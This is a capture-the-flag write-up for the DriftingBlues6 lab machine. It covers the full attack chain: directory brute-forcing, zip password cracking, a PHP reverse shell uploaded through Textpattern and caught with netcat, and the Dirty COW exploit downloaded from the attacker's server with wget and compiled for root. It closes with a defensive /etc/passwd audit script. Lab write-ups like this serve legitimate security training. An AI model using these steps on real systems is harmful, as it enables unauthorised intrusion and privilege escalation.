Proving Grounds Play: DriftingBlues6

RATING

Easy

ENUMERATION

We kick things off with our usual nmap scan here:

Command: nmap -sV -sC -T4 -Pn -p- 192.168.201.219

Since the nmap scan shows a robots.txt file, we open it in the browser and spot the directory /textpattern/textpattern along with a hint:

Navigating to this directory, we see a login page:

Since we do not have any login credentials, we follow the hint instead. We brute-force directories with feroxbuster, looking specifically for files with the .zip extension, and find spammer.zip:

Command: feroxbuster -u http://192.168.201.219/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -k -d 1 --quiet -s 200 -x zip

Because this zip file is password protected, we use zip2john and john to brute-force the passphrase:

Command: zip2john spammer.zip > spammer.hash

Command: john --wordlist=rockyou.txt spammer.hash

After unzipping the archive, we find the file creds.txt, which reveals a username and password:

Command: unzip -e spammer.zip

Command: cat creds.txt

EXPLOITATION

With these credentials, we are able to log into http://192.168.201.219/textpattern/textpattern/:

Navigating to the content section, we see that we are able to upload files. Immediately, our minds should go to a PHP reverse shell:

After editing the IP address and port in our shell, we upload it, trigger it by navigating to http://192.168.201.219/textpattern/files/php-shell.php, and catch it with our netcat listener:

Command: nc -nvlp 1234

We can see that Python is installed, so we use it to upgrade our shell:

Command: python -c 'import pty; pty.spawn("/bin/bash")'

Checking the kernel version, we see it is 3.2.0. A bit of research shows that this kernel is vulnerable to the Dirty COW exploit:

Using searchsploit, we look up Dirty COW exploits and settle on 40839.c:

Command: searchsploit dirty cow

Command: searchsploit -m 40839.c

PRIVILEGE ESCALATION

We transfer our exploit code over to the target and compile it:

Command: python3 -m http.server 80 (on attacker machine)

Command: wget http://192.168.45.194/40839.c (on target)

Command: gcc -pthread 40839.c -o dirtycow -lcrypt

We execute our exploit, which adds the user firefart with a password of our choosing (testpassword in our case):

Now it's only a matter of switching to our new user, who has root privileges, and reading proof.txt:
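From the defender's side, the footprint this privilege escalation leaves is easy to audit: 40839.c works by writing a new UID-0 account (firefart) into /etc/passwd. The script below is an added example, not part of the original write-up or of the exploit; it parses passwd-format text and flags any UID-0 account other than root, a missing root entry, and malformed lines. The embedded sample is constructed to mirror the post-exploit state.

```python
import os

# Constructed sample of /etc/passwd after the exploit: a second UID-0
# account ("firefart") sits beside the legitimate root entry.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
firefart:x:0:0:pwned:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
"""


def parse_passwd(text):
    """Parse passwd-format text into dicts; blank and comment lines are skipped."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:  # passwd(5) entries always have exactly 7 fields
            entries.append({"line": lineno, "malformed": line})
            continue
        name, _pw, uid, gid, _gecos, home, shell = fields
        entries.append({"line": lineno, "name": name, "uid": uid,
                        "gid": gid, "home": home, "shell": shell})
    return entries


def audit_passwd(text):
    """Return findings: unexpected UID-0 accounts, missing root, malformed lines."""
    findings = []
    names = set()
    for e in parse_passwd(text):
        if "malformed" in e:
            findings.append(f"line {e['line']}: malformed entry")
            continue
        names.add(e["name"])
        if not e["uid"].isdigit():
            findings.append(f"line {e['line']}: non-numeric uid for {e['name']}")
        elif int(e["uid"]) == 0 and e["name"] != "root":
            findings.append(f"line {e['line']}: uid 0 account '{e['name']}' (not root)")
    if "root" not in names:
        findings.append("root account missing (possibly overwritten)")
    return findings


if __name__ == "__main__":
    # Audit the live file when it exists, otherwise the constructed sample.
    path = "/etc/passwd"
    text = open(path).read() if os.path.exists(path) else SAMPLE_PASSWD
    for finding in audit_passwd(text) or ["no findings"]:
        print(finding)
```

Running the audit from cron and alerting on any non-empty result catches this class of change even when the shell history was wiped.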